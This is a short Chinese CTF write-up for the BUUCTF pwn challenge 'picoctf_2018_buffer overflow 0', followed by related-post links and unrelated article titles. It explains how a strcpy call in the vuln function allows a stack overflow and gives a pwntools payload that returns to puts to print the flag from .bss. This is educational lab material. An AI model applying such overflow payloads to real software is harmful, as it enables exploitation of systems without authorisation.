[BUUCTF-pwn]——picoctf_2018_buffer overflow 0

好久不写BUU了,手都快生了赶快过来写写。
通过观察源文件发现,首先有put函数不需要去libc中找,同时argv肯定大于1,也就是需要至少两个参数,才可以到else语句,同时vuln函数的参数是第二个参数。

进入vuln函数内部看看,找到strcpy函数这个函数是一个典型的可以用来利用溢出的函数。所以我们可以在这里进行栈溢出,以此调用puts函数打印flag.因为flag在bss段上。

from pwn import *
elf = ELF("./PicoCTF_2018_buffer_overflow_0")
payload = 'a' * (0x18 + 4) + p32(elf.plt['puts']) + 'junk' + p32(0x0804A080)
print("payload : " + payload)


[BUUCTF-pwn]——picoctf_2018_buffer overflow 0相关推荐

  1. BUUCTF--pwn picoctf_2018_buffer overflow 0

    来查看信号函数代表的含义: 11是 SIGSEGV,表示对存储的无效访问 点进去sigsegv_handler 同时将flag的值赋予了stderr 现在知道那个信号函数的作用是: 当发生 对存储的无 ...

  2. 持续更新 BUUCTF——PWN(一)

    文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...

  3. [BUUCTF-pwn]——picoctf_2018_buffer overflow 2

    [BUUCTF-pwn]--picoctf_2018_buffer overflow 2 简单的栈溢出,不过需要将参数自己设置而已 注意负数如何转换为补码, 不知道也可以直接在汇编里面找 from p ...

  4. [BUUCTF-pwn]——picoctf_2018_buffer overflow 1

    [BUUCTF-pwn]--picoctf_2018_buffer overflow 1 简单的栈溢出, 返回地址,设置为win就好 exploit from pwn import * p = rem ...

  5. BUUCTF Pwn warmup

    BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...

  6. BUUCTF PWN rip1 WP

    BUUCTF   PWN   rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...

  7. buuctf pwn bjdctf_2020_babyrop

    buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...

  8. 持续更新 BUUCTF——PWN(二)

    文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...

  9. 持续更新 BUUCTF——PWN(三)

    文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...

最新文章

  1. MCU多任务提高实时性
  2. 一点通路由器模拟软件最新版_2019年高压电工作业考试最新版题库及答案(全部判断题)...
  3. python解码函数_python2和python3的编码encode解码decode函数
  4. 知乎上 40 个有趣回复,很精辟!
  5. SpringBoot整合HBase将数据写入Docker中的HBase
  6. Visual Studio 2022 Preview 3和2019 16.11发布
  7. python文件头--文件编码指定
  8. JS中的this好神奇,都把我弄晕了
  9. 凤凰网php,凤凰网某应用sql注入漏洞_MySQL
  10. python调用scp上传目录_Python调用scp向服务器上传文件示例
  11. Android中的USB中的UsbAccessory和UsbDevice的区别
  12. 22个HTML5和CSS3表单教程
  13. element-ui tree全部展开和全部折叠
  14. 【AliOS Studio】AliOS Studio初体验
  15. php groovy,Groovy
  16. 关于键盘方向键的ASCII的问题解释
  17. tesra内测阶段在线GPU的使用
  18. Vue启动报错This is probably not a problem with npm. There is likely additional logging output above.
  19. 关于AES:加密方式,让你的APK无懈可击,android性能优化和内存优化面试
  20. 乒乓球 牛客 NTT

热门文章

  1. linux进入命令是什么,linux进入目录的命令是什么
  2. oracle段管理方式设为自动,oracle自动段管理ASSM笔记
  3. 【Python数据挖掘课程】三.Kmeans聚类代码实现、作业及优化
  4. 利用一根同轴电缆互连主机构成以太网,则主机间的通信方式为( )
  5. MapReduce不同进度的Reduce都在干什么?
  6. 盖茨发文谈如何实现零碳目标 称看好电动车未来
  7. LeetCode 292. Nim Game
  8. 大数据互联网架构阶段 Redis(二)
  9. 【MFC】带背景的工具栏
  10. 【ARM】Tiny4412裸板编程之异常(软中断)